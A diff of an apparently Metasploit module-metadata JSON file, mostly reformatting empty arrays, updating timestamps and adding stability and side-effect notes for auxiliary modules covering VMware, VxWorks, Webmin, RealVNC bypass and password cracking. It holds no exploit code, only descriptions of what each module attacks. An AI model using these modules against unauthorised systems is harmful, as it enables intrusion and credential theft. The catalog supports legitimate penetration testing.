@@ -11163,12 +11349,8 @@
"platform": "",
"arch": "",
"rport": 1025,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
"mod_time": "2021-05-17 17:04:49 +0000",
"path": "/modules/auxiliary/admin/teradata/teradata_odbc_sql.py",
@@ -11184,16 +11366,12 @@
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/tftp/tftp_transfer_util": {
"name": "TFTP File Transfer Utility",
"fullname": "auxiliary/admin/tftp/tftp_transfer_util",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -11208,14 +11386,10 @@
"platform": "",
"arch": "",
"rport": 69,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/tftp/tftp_transfer_util.rb",
"is_install_path": true,
"ref_name": "admin/tftp/tftp_transfer_util",
@@ -11223,6 +11397,14 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "artifacts-on-disk"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -11240,16 +11422,14 @@
"auxiliary_admin/tikiwiki/tikidblib": {
"name": "TikiWiki Information Disclosure",
"fullname": "auxiliary/admin/tikiwiki/tikidblib",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2006-11-01",
"type": "auxiliary",
"author": [
"Matteo Cantoni "
],
- "description": "A vulnerability has been reported in Tikiwiki, which can be exploited by\n an anonymous user to dump the MySQL user & passwd just by creating a mysql\n error with the \"sort_mode\" var.\n\n The vulnerability was reported in Tikiwiki version 1.9.5.",
+ "description": "A vulnerability has been reported in Tikiwiki, which can be exploited by\n an anonymous user to dump the MySQL user & passwd just by creating a mysql\n error with the \"sort_mode\" var.\n\n The vulnerability was reported in Tikiwiki version 1.9.5.",
"references": [
"OSVDB-30172",
"BID-20858",
@@ -11275,7 +11455,7 @@
"https"
],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/tikiwiki/tikidblib.rb",
"is_install_path": true,
"ref_name": "admin/tikiwiki/tikidblib",
@@ -11283,6 +11463,11 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -11296,9 +11481,7 @@
"auxiliary_admin/upnp/soap_portmapping": {
"name": "UPnP IGD SOAP Port Mapping Utility",
"fullname": "auxiliary/admin/upnp/soap_portmapping",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -11329,15 +11512,14 @@
"https"
],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/upnp/soap_portmapping.rb",
"is_install_path": true,
"ref_name": "admin/upnp/soap_portmapping",
"check": false,
"post_auth": false,
"default_credential": false,
- "notes": {
- },
+ "notes": {},
"session_types": false,
"needs_cleanup": false,
"actions": [
@@ -11354,9 +11536,7 @@
"auxiliary_admin/vmware/poweroff_vm": {
"name": "VMWare Power Off Virtual Machine",
"fullname": "auxiliary/admin/vmware/poweroff_vm",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -11364,9 +11544,7 @@
"theLightCosine "
],
"description": "This module will log into the Web API of VMWare and try to power off\n a specified Virtual Machine.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 443,
@@ -11386,27 +11564,22 @@
"https"
],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/vmware/poweroff_vm.rb",
"is_install_path": true,
"ref_name": "admin/vmware/poweroff_vm",
"check": false,
"post_auth": true,
"default_credential": false,
- "notes": {
- },
+ "notes": {},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/vmware/poweron_vm": {
"name": "VMWare Power On Virtual Machine",
"fullname": "auxiliary/admin/vmware/poweron_vm",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -11414,9 +11587,7 @@
"theLightCosine "
],
"description": "This module will log into the Web API of VMWare and try to power on\n a specified Virtual Machine.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 443,
@@ -11436,27 +11607,22 @@
"https"
],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/vmware/poweron_vm.rb",
"is_install_path": true,
"ref_name": "admin/vmware/poweron_vm",
"check": false,
"post_auth": true,
"default_credential": false,
- "notes": {
- },
+ "notes": {},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/vmware/tag_vm": {
"name": "VMWare Tag Virtual Machine",
"fullname": "auxiliary/admin/vmware/tag_vm",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -11464,9 +11630,7 @@
"theLightCosine "
],
"description": "This module will log into the Web API of VMWare and\n 'tag' a specified Virtual Machine. It does this by\n logging a user event with user supplied text",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 443,
@@ -11486,27 +11650,22 @@
"https"
],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/vmware/tag_vm.rb",
"is_install_path": true,
"ref_name": "admin/vmware/tag_vm",
"check": false,
"post_auth": true,
"default_credential": false,
- "notes": {
- },
+ "notes": {},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/vmware/terminate_esx_sessions": {
"name": "VMWare Terminate ESX Login Sessions",
"fullname": "auxiliary/admin/vmware/terminate_esx_sessions",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -11514,9 +11673,7 @@
"theLightCosine "
],
"description": "This module will log into the Web API of VMWare and try to terminate\n user login sessions as specified by the session keys.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 443,
@@ -11536,27 +11693,22 @@
"https"
],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb",
"is_install_path": true,
"ref_name": "admin/vmware/terminate_esx_sessions",
"check": false,
"post_auth": true,
"default_credential": false,
- "notes": {
- },
+ "notes": {},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/vmware/vcenter_forge_saml_token": {
"name": "VMware vCenter Forge SAML Authentication Credentials",
"fullname": "auxiliary/admin/vmware/vcenter_forge_saml_token",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2022-04-20",
"type": "auxiliary",
@@ -11616,9 +11768,7 @@
"auxiliary_admin/vmware/vcenter_offline_mdb_extract": {
"name": "VMware vCenter Extract Secrets from vmdir / vmafd DB File",
"fullname": "auxiliary/admin/vmware/vcenter_offline_mdb_extract",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2022-05-10",
"type": "auxiliary",
@@ -11632,12 +11782,8 @@
"platform": "Linux",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
"mod_time": "2022-05-26 11:52:56 +0000",
"path": "/modules/auxiliary/admin/vmware/vcenter_offline_mdb_extract.rb",
@@ -11669,9 +11815,7 @@
"auxiliary_admin/vnc/realvnc_41_bypass": {
"name": "RealVNC NULL Authentication Mode Bypass",
"fullname": "auxiliary/admin/vnc/realvnc_41_bypass",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2006-05-15",
"type": "auxiliary",
@@ -11679,7 +11823,7 @@
"hdm ",
"theLightCosine "
],
- "description": "This module exploits an Authentication bypass Vulnerability\n in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy\n listener on LPORT and proxies to the target server\n\n The AUTOVNC option requires that vncviewer be installed on\n the attacking machine.",
+ "description": "This module exploits an Authentication bypass vulnerability\n in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy\n listener on LPORT and proxies to the target server.\n\n The AUTOVNC option requires that vncviewer be installed on\n the attacking machine.",
"references": [
"BID-17978",
"OSVDB-25479",
@@ -11689,14 +11833,10 @@
"platform": "",
"arch": "",
"rport": 5900,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb",
"is_install_path": true,
"ref_name": "admin/vnc/realvnc_41_bypass",
@@ -11704,42 +11844,41 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/vxworks/apple_airport_extreme_password": {
"name": "Apple Airport Extreme Password Extraction (WDBRPC)",
"fullname": "auxiliary/admin/vxworks/apple_airport_extreme_password",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm "
],
- "description": "This module can be used to read the stored password of a vulnerable\n Apple Airport Extreme access point. Only a small number of firmware versions\n have the WDBRPC service running, however the factory configuration was\n vulnerable. It appears that firmware versions 5.0.x as well as 5.1.x are\n susceptible to this issue. Once the password is obtained, the access point\n can be managed using the Apple AirPort utility.",
+ "description": "This module can be used to read the stored password of a vulnerable\n Apple Airport Extreme access point. Only a small number of firmware versions\n have the WDBRPC service running, however the factory configuration was\n vulnerable. It appears that firmware versions 5.0.x as well as 5.1.x are\n susceptible to this issue. Once the password is obtained, the access point\n can be managed using the Apple AirPort utility.",
"references": [
"OSVDB-66842",
- "URL-https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/",
+ "URL-http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/",
"US-CERT-VU-362332"
],
"platform": "",
"arch": "",
"rport": 17185,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb",
"is_install_path": true,
"ref_name": "admin/vxworks/apple_airport_extreme_password",
@@ -11747,42 +11886,39 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/vxworks/dlink_i2eye_autoanswer": {
"name": "D-Link i2eye Video Conference AutoAnswer (WDBRPC)",
"fullname": "auxiliary/admin/vxworks/dlink_i2eye_autoanswer",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm "
],
- "description": "This module can be used to enable auto-answer mode for the D-Link\n i2eye video conferencing system. Once this setting has been flipped,\n the device will accept incoming video calls without acknowledgement.\n The NetMeeting software included in Windows XP can be used to connect\n to this device. The i2eye product is no longer supported by the vendor\n and all models have reached their end of life (EOL).",
+ "description": "This module can be used to enable auto-answer mode for the D-Link\n i2eye video conferencing system. Once this setting has been flipped,\n the device will accept incoming video calls without acknowledgement.\n The NetMeeting software included in Windows XP can be used to connect\n to this device. The i2eye product is no longer supported by the vendor\n and all models have reached their end of life (EOL).",
"references": [
"OSVDB-66842",
- "URL-https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/",
+ "URL-http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/",
"US-CERT-VU-362332"
],
"platform": "",
"arch": "",
"rport": 17185,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb",
"is_install_path": true,
"ref_name": "admin/vxworks/dlink_i2eye_autoanswer",
@@ -11790,19 +11926,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/vxworks/wdbrpc_memory_dump": {
"name": "VxWorks WDB Agent Remote Memory Dump",
"fullname": "auxiliary/admin/vxworks/wdbrpc_memory_dump",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -11812,20 +11951,16 @@
"description": "This module provides the ability to dump the system memory of a VxWorks target through WDBRPC",
"references": [
"OSVDB-66842",
- "URL-https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/",
+ "URL-http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/",
"US-CERT-VU-362332"
],
"platform": "",
"arch": "",
"rport": 17185,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb",
"is_install_path": true,
"ref_name": "admin/vxworks/wdbrpc_memory_dump",
@@ -11833,6 +11968,13 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -11846,32 +11988,26 @@
"auxiliary_admin/vxworks/wdbrpc_reboot": {
"name": "VxWorks WDB Agent Remote Reboot",
"fullname": "auxiliary/admin/vxworks/wdbrpc_reboot",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm "
],
- "description": "This module provides the ability to reboot a VxWorks target through WDBRPC",
+ "description": "This module provides the ability to reboot a VxWorks target through WDBRPC.",
"references": [
"OSVDB-66842",
- "URL-https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/",
+ "URL-http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/",
"US-CERT-VU-362332"
],
"platform": "",
"arch": "",
"rport": 17185,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb",
"is_install_path": true,
"ref_name": "admin/vxworks/wdbrpc_reboot",
@@ -11879,6 +12015,11 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-os-restarts"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -11892,9 +12033,7 @@
"auxiliary_admin/webmin/edit_html_fileaccess": {
"name": "Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access",
"fullname": "auxiliary/admin/webmin/edit_html_fileaccess",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2012-09-06",
"type": "auxiliary",
@@ -11902,7 +12041,7 @@
"Unknown",
"juan vazquez "
],
- "description": "This module exploits a directory traversal in Webmin 1.580. The vulnerability\n exists in the edit_html.cgi component and allows an authenticated user with access\n to the File Manager Module to access arbitrary files with root privileges. The\n module has been tested successfully with Webmin 1.580 over Ubuntu 10.04.",
+ "description": "This module exploits a directory traversal in Webmin 1.580. The vulnerability\n exists in the edit_html.cgi component and allows an authenticated user with access\n to the File Manager Module to access arbitrary files with root privileges. The\n module has been tested successfully with Webmin 1.580 over Ubuntu 10.04.",
"references": [
"OSVDB-85247",
"BID-55446",
@@ -11929,7 +12068,7 @@
"https"
],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb",
"is_install_path": true,
"ref_name": "admin/webmin/edit_html_fileaccess",
@@ -11937,6 +12076,13 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -11950,16 +12096,14 @@
"auxiliary_admin/webmin/file_disclosure": {
"name": "Webmin File Disclosure",
"fullname": "auxiliary/admin/webmin/file_disclosure",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2006-06-30",
"type": "auxiliary",
"author": [
"Matteo Cantoni "
],
- "description": "A vulnerability has been reported in Webmin and Usermin, which can be\n exploited by malicious people to disclose potentially sensitive information.\n The vulnerability is caused due to an unspecified error within the handling\n of an URL. This can be exploited to read the contents of any files on the\n server via a specially crafted URL, without requiring a valid login.\n The vulnerability has been reported in Webmin (versions prior to 1.290) and\n Usermin (versions prior to 1.220).",
+ "description": "A vulnerability has been reported in Webmin and Usermin, which can be\n exploited by malicious people to disclose potentially sensitive information.\n The vulnerability is caused due to an unspecified error within the handling\n of an URL. This can be exploited to read the contents of any files on the\n server via a specially crafted URL, without requiring a valid login.\n The vulnerability has been reported in Webmin (versions prior to 1.290) and\n Usermin (versions prior to 1.220).",
"references": [
"OSVDB-26772",
"BID-18744",
@@ -11986,7 +12130,7 @@
"https"
],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/webmin/file_disclosure.rb",
"is_install_path": true,
"ref_name": "admin/webmin/file_disclosure",
@@ -11994,6 +12138,13 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -12007,18 +12158,16 @@
"auxiliary_admin/wemo/crockpot": {
"name": "Belkin Wemo-Enabled Crock-Pot Remote Control",
"fullname": "auxiliary/admin/wemo/crockpot",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu "
],
- "description": "This module acts as a simple remote control for Belkin Wemo-enabled\n Crock-Pots by implementing a subset of the functionality provided by the\n Wemo App.\n\n No vulnerabilities are exploited by this Metasploit module in any way.",
+ "description": "This module acts as a simple remote control for Belkin Wemo-enabled\n Crock-Pots by implementing a subset of the functionality provided by the\n Wemo App.\n\n No vulnerabilities are exploited by this Metasploit module in any way.",
"references": [
- "URL-https://www.crock-pot.com/wemo-landing-page.html",
+ "URL-http://web.archive.org/web/20180301171809/https://www.crock-pot.com/wemo-landing-page.html",
"URL-https://www.belkin.com/us/support-article?articleNum=101177",
"URL-http://www.wemo.com/"
],
@@ -12041,7 +12190,7 @@
"https"
],
"targets": null,
- "mod_time": "2020-12-03 01:04:48 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/wemo/crockpot.rb",
"is_install_path": true,
"ref_name": "admin/wemo/crockpot",
@@ -12054,7 +12203,8 @@
],
"SideEffects": [
"physical-effects"
- ]
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -12072,9 +12222,7 @@
"auxiliary_admin/zend/java_bridge": {
"name": "Zend Server Java Bridge Design Flaw Remote Code Execution",
"fullname": "auxiliary/admin/zend/java_bridge",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2011-03-28",
"type": "auxiliary",
@@ -12082,7 +12230,7 @@
"ikki",
"MC "
],
- "description": "This module abuses a flaw in the Zend Java Bridge Component of\n the Zend Server Framework. By sending a specially crafted packet, an\n attacker may be able to execute arbitrary code.\n\n NOTE: This module has only been tested with the Win32 build of the software.",
+ "description": "This module abuses a flaw in the Zend Java Bridge Component of\n the Zend Server Framework. By sending a specially crafted packet, an\n attacker may be able to execute arbitrary code.\n\n NOTE: This module has only been tested with the Win32 build of the software.",
"references": [
"OSVDB-71420",
"ZDI-11-113",
@@ -12091,14 +12239,10 @@
"platform": "",
"arch": "",
"rport": 10001,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/zend/java_bridge.rb",
"is_install_path": true,
"ref_name": "admin/zend/java_bridge",
@@ -12106,19 +12250,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_analyze/apply_pot": {
"name": "Apply Pot File To Hashes",
"fullname": "auxiliary/analyze/apply_pot",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -12126,20 +12273,14 @@
"h00die"
],
"description": "This module uses a John the Ripper or Hashcat .pot file to crack any password\n hashes in the creds database instantly. JtR's --show functionality is used to\n help combine all the passwords into an easy to use format.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-07 21:38:27 +0000",
"path": "/modules/auxiliary/analyze/apply_pot.rb",
"is_install_path": true,
"ref_name": "analyze/apply_pot",
@@ -12147,6 +12288,11 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -12172,20 +12318,14 @@
"h00die"
],
"description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from passwd files on AIX systems. These utilize DES hashing.\n DES is format 1500 in Hashcat.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2023-02-18 18:12:12 +0000",
+ "mod_time": "2025-05-07 21:38:27 +0000",
"path": "/modules/auxiliary/analyze/crack_aix.rb",
"is_install_path": true,
"ref_name": "analyze/crack_aix",
@@ -12193,6 +12333,11 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -12225,20 +12370,14 @@
"h00die"
],
"description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from the mssql_hashdump, mysql_hashdump, postgres_hashdump, or oracle_hashdump modules.\n Passwords that have been successfully cracked are then saved as proper credentials.\n Due to the complexity of some of the hash types, they can be very slow. Setting the\n ITERATION_TIMEOUT is highly recommended.\n MSSQL is 131, 132, and 1731 in hashcat.\n MYSQL is 200, and 300 in hashcat.\n ORACLE is 112, and 12300 in hashcat.\n POSTGRES is 12 in hashcat.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2023-02-18 18:12:12 +0000",
+ "mod_time": "2025-05-07 21:38:27 +0000",
"path": "/modules/auxiliary/analyze/crack_databases.rb",
"is_install_path": true,
"ref_name": "analyze/crack_databases",
@@ -12246,6 +12385,11 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -12275,20 +12419,14 @@
"h00die"
],
"description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from unshadowed passwd files from Unix/Linux systems. The module will only crack\n MD5, BSDi and DES implementations by default. However, it can also crack\n Blowfish and SHA(256/512), but it is much slower.\n MD5 is format 500 in hashcat.\n DES is format 1500 in hashcat.\n BSDI is format 12400 in hashcat.\n BLOWFISH is format 3200 in hashcat.\n SHA256 is format 7400 in hashcat.\n SHA512 is format 1800 in hashcat.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2023-02-18 18:12:12 +0000",
+ "mod_time": "2025-05-07 21:38:27 +0000",
"path": "/modules/auxiliary/analyze/crack_linux.rb",
"is_install_path": true,
"ref_name": "analyze/crack_linux",
@@ -12296,6 +12434,11 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -12313,9 +12456,7 @@
"auxiliary_analyze/crack_mobile": {
"name": "Password Cracker: Mobile",
"fullname": "auxiliary/analyze/crack_mobile",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -12323,20 +12464,14 @@
"h00die"
],
"description": "This module uses Hashcat to identify weak passwords that have been\n acquired from Android systems. These utilize MD5 or SHA1 hashing.\n Android (Samsung) SHA1 is format 5800 in Hashcat. Android\n (non-Samsung) SHA1 is format 110 in Hashcat. Android MD5 is format 10.\n JTR does not support Android hashes at the time of writing.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2023-02-18 13:09:45 +0000",
+ "mod_time": "2025-05-07 21:38:27 +0000",
"path": "/modules/auxiliary/analyze/crack_mobile.rb",
"is_install_path": true,
"ref_name": "analyze/crack_mobile",
@@ -12344,6 +12479,11 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -12357,9 +12497,7 @@
"auxiliary_analyze/crack_osx": {
"name": "Password Cracker: OSX",
"fullname": "auxiliary/analyze/crack_osx",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -12367,20 +12505,14 @@
"h00die"
],
"description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from OSX systems. The module will only crack xsha from OSX 10.4-10.6, xsha512\n from 10.7, and PBKDF2 from OSX 10.8+.\n XSHA is 122 in hashcat.\n XSHA512 is 1722 in hashcat.\n PBKDF2 (PBKDF2-HMAC-SHA512) is 7100 in hashcat.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2023-02-18 18:12:12 +0000",
+ "mod_time": "2025-05-07 21:38:27 +0000",
"path": "/modules/auxiliary/analyze/crack_osx.rb",
"is_install_path": true,
"ref_name": "analyze/crack_osx",
@@ -12388,6 +12520,11 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -12405,9 +12542,7 @@
"auxiliary_analyze/crack_webapps": {
"name": "Password Cracker: Webapps",
"fullname": "auxiliary/analyze/crack_webapps",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -12415,20 +12550,14 @@
"h00die"
],
